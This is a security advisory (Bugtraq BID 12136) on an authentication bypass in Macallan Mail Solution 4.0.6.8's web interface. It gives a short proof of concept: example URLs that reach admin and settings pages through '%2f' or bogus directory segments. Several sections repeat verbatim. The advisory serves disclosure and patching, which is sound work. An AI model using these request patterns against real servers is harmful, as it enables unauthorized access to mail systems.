Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
BID:12136
Info
Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
| Bugtraq ID: | 12136 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 31 2004 12:00AM |
| Updated: | Dec 31 2004 12:00AM |
| Credit: | Discovery is credited to Dennis Rand. |
| Vulnerable: |
Macallan Mail Solution Macallan Mail Solution 4.0.6 .8 (Build 768) |
| Not Vulnerable: |
Macallan Mail Solution Macallan Mail Solution 4.1.1 .0 |
Discussion
Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
Macallan Mail Solution is prone to a vulnerability that may permit remote attackers to gain unauthorized access to the Web interface.
It is reported that by including extraneous URL-encoded slash characters (%2f), a remote user may access restricted pages in the Web interface and perform various actions. It was also reported that authentication may be bypassed by specifying a non-existent directory when requesting a resource within the Web interface.
This issue is a variant of the vulnerability described in BID 9646.
Macallan Mail Solution is prone to a vulnerability that may permit remote attackers to gain unauthorized access to the Web interface.
It is reported that by including extraneous URL-encoded slash characters (%2f), a remote user may access restricted pages in the Web interface and perform various actions. It was also reported that authentication may be bypassed by specifying a non-existent directory when requesting a resource within the Web interface.
This issue is a variant of the vulnerability described in BID 9646.
Exploit / POC
Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
The following examples were submitted:
http://www.example.com:8080/%2f/newmessage.html
http://www.example.com:8080/%2f/admin.html
http://www.example.com:8080/%2f/settings.html
http://www.example.com:8080/qwe/newmessage.html
http://www.example.com:8080/qwe/admin.html
http://www.example.com:8080/qwe/settings.html
The following examples were submitted:
http://www.example.com:8080/%2f/newmessage.html
http://www.example.com:8080/%2f/admin.html
http://www.example.com:8080/%2f/settings.html
http://www.example.com:8080/qwe/newmessage.html
http://www.example.com:8080/qwe/admin.html
http://www.example.com:8080/qwe/settings.html
Solution / Fix
Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
Solution:
This issue is reportedly addressed in Macallan Mail Solution 4.1.1.0. Symantec has not confirmed this information.
---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
This issue is reportedly addressed in Macallan Mail Solution 4.1.1.0. Symantec has not confirmed this information.
---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Macallan Mail Solution Web Interface Authentication Bypass Variant Vulnerability
References:
References:
- Macallan Mail Solution 4.0.6.8 (Build 786) multiple vulnerabilities (Dennis Rand)
- Macallan Mail Solution Homepage (Macallan Mail Solution)